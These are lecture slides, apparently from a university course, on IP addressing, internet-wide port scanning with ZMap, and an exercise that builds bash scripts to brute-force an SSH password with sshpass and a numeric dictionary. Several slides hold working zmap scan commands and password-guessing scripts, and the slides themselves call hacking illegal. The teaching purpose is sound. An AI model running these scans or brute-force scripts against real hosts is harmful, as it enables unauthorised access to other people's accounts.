1 Network Security In Linux: Scanning and Hacking
2 Review Lex A lexical analyzer that tokenizes an input text. Yacc A parser that parses and acts based on defined grammar rules involving tokens. How to compile Lex and Yacc source files into an executable file.
3 Outline A naïve way to hack Background IP network TCP protocols Network scanning A script for infinite SSH login attempt.
4 Background Internet: A set of inter-connected networks Largely rely on the TCP/IP protocol IP : Internet Protocol Provide an address for information routing Data is segmented into packets. TCP : Transmission Control Protocol Over IP, control how to transmit IP packets, Port numbers: differentiate services.
5 IP Responsible for end to end transmission Sends data in individual packets Maximum size of packet is determined by the networks Fragmented if too large Unreliable Packets might be lost, corrupted, duplicated, delivered out of order
6 IP address IP address: 4 bytes e.g (csa.memphis.edu) Each device normally gets one In theory there are about 4 billion available A subnet: 4 bytes IP / [0~32] Represent a range of IP addresses e.g., /22 a subnet at UofM, including computers in Dunn Hall.
7 TCP port number A port number is an application-specific software construct serving as a communications endpoint in a computer's host operating system. 2 Bytes: 0 ~ Used to differentiate services. Examples: 21 FTP, 22 SSH, 23 Telnet, 80 HTTP, 443 HTTPS
8 How to connect to a machine You got an IP address, you know what you want Surfing web send packets with the destination IP and port number 80 SSH login send packets with the destination IP and port number 22 Then, wait for the data sent back.
9 Potential Risks As long as your machine has an IP and connect to the Internet, everyone can try to log in to your machine. FTP login SSH login Telnet login PHP login MySQL login Our focus here
10 How to SSH log in to a machine Steps: You need to know a machine has SSH service. You need a username and a password, Then, connect to the destination IP on port 22. Example: ssh The computer will create a packet consisting of The IP of csa.memphis.edu: The port number of SSH: 22 The username: comp4272
11 Check if a machine supports SSH Port scanning Scan a subnet or the whole Internet to see which machines support SSH login. Implementation: Send a login packet to an IP with port 22, test if there is a response.
12 Scanning Tool in Linux ZMap A very recent tool. Released in Installation: Download the source, compile and install. Ubuntu/Mint: apt-get install zmap
13 ZMap Feature Fast can port scan the entire IPv4 address space from just one machine in under 1 hour.
14 Speed of ZMap vs Nmap Averages for scanning 1 million random hosts From ZMap authors slides
15 Internet wide results by ZMap (I) Find vulnerabilities upnp vulnerability disclosed by HD Moore, Jan Scan results in Feb: 15.7 million publicly accessible UPnP devices 3.4 million still vulnerable. ( ~22% )
16 Internet wide results by ZMap (2) Find service availability Outages during Hurricane Sandy, Oct-Nov 2012 More than 30% decrease From ZMap authors slides
17 Is port scan legal? DoS attacks Definitely break the law Hacking into someone s computer Definitely break the law Port scan Gray area? most likely prohibited by ISP. Detection systems can prevent port scan.
18 Response results to ZMap scan 200 Internet-wide scans Got response to exclude 3,753,899 addresses (~0.11% of the IP address space) From ZMap authors slides
19 ZMap for our use zmap p [port] [IP]/[mask] i [device] o [file] -p: specify a port number -i: can be omitted if you have just one network device -o: output all found IPs into a file Example: zmap p /22 i eth1 zmap p /24 i eth1
20 Exercise: do a port scan Scan subnet /22 with port 80. port 22.
21 Mission Suppose Tom has an account At a remote host: csa.memphis.edu Username: tom Passwords: don t know, but all numbers. Task: write a shell script to get the password
22 How to guess a password Create a dictionary try all passwords in the dictionary one by one How to create a dictionary: Non-trivial Social engineering What s the user s name? What s the user s birthday? What s the user s nickname?.
23 Guidelines to create a dictionary Some common things about our passwords People tend to write letters first, then numbers People tend to write special characters last.!, #, $, % People tend to use birthday, phone numbers, street numbers, zip code, Some people tend to use only numbers. Many people don t like uppercase, or put uppercase first.
27 A password with only numbers DON T use password that contains only numbers! Create a dictionary that contains all combinations of numbers. Try them one by one. #dict.txt
28 Try password We can manually try passwords in the dictionary one by one. Or, we can write a shell script to try all passwords. #dict.txt csa.memphis.edu tom ssh port 22
29 sshpass Command ssh does not support automatic password entering: ssh You always need to enter the password manually. sshpass: support enter password in command line. Ubuntu/Mint install: apt-get install sshpass Usage: sshpass p [password] [orginal ssh command]
30 sshpass example sshpass -p "12812" ssh If success, it will log in. Otherwise, it will say Permission denied, please try again. Try more: sshpass -p "11111" ssh sshpass -p comp4272" ssh
31 Write a shell script trypassword The arguments of the script are First: IP Second: username Third: password Example:./trypassword csa.memphis.edu tom 1 The script tells you if the login is successful.
32 trypassword script #!/bin/bash # $1 - ip address to hack # $2 - username # $3 - password Any issue? sshpass -p "$3" ssh &> /dev/null if [ $? -eq 0 ]; then echo "Find the password: $3" exit 0 fi exit 1 /dev/null is a device file that discard all data written to it
33 The correct script #!/bin/bash # $1 - ip address to hack # $2 - username # $3 - password echo exit sshpass -p "$3" ssh &> /dev/null if [ $? -eq 0 ]; then echo "Find the password: $3" exit 0 fi exit 1
34 Put trypassword in a loop trypassword offers one try. Our objective Try every password in the dictionary Put trypassword in a loop. Each time, we try one different password Until we find the correct password. Create a script runhacking
35 runhacking script #!/bin/bash ip=csa.memphis.edu username=tom dict=dict.txt for password in `cat $dict`; do echo "Try password: $password"./trypassword $ip $username $password if [ $? -eq 0 ]; then exit 0 fi done exit 1 Any issue? Are we done?
36 Speed up the process #!/bin/bash ip=csa.memphis.edu username=tom dict=dict.txt for password in `cat $dict`; do echo "Try password: $password"./trypassword $ip $username $password if [ $? -eq 0 ]; then exit 0 fi done exit 1 It will hang there and wait for the result!
37 Our current strategy server time... hacker time
38 A better strategy server time... hacker time
39 The new runhacking script #!/bin/bash ip=csa.memphis.edu username=tom dict=dict.txt for password in `cat $dict`; do echo "Try password: $password"./trypassword $ip $username $password & if [ $? -eq 0 ]; then exit 0 done exit 1 fi $? is always 0, how to handle this? & is to make the command run in background (a process will be created to run the command)
40 How to track status./trypassword./trypassword runhacking./trypassword How can we know a particular process finds the password in the runhacking script? multiple ways../trypassword
41 If find password, create a file #!/bin/bash # trypassword script: # $1 - ip address to hack # $2 - username # $3 - password # $4 - the filename to save the found password echo "exit" sshpass -p "$3" ssh &> /dev/null if [ $? -eq 0 ]; then echo "Find the password: $3" echo $3 > $4 exit 0 fi exit 1
42 The final runhacking script #!/bin/bash ip=csa.memphis.edu username=tom dict=dict.txt pwfile=password rm -f $pwfile for password in `cat $dict`; do echo "Try password: $password"./trypassword $ip $username $password $pwfile & done exit 1 # If the password file is created, we find it and exit if [ -f $pwfile ]; then exit 0 fi
43 Discussions Hacking is ILLEGAL! Running this script to connect to other s computer is illegal! The other s computer can have your IP record, then trace you back. You can try the script on csa.memphis.edu How to prevent this very naïve hacking?
44 Summary TCP/IP networks IP address and TCP port ZMap Very fast Internet scanner A naïve script to try passwords Hacking is ILLEGAL! How to defend?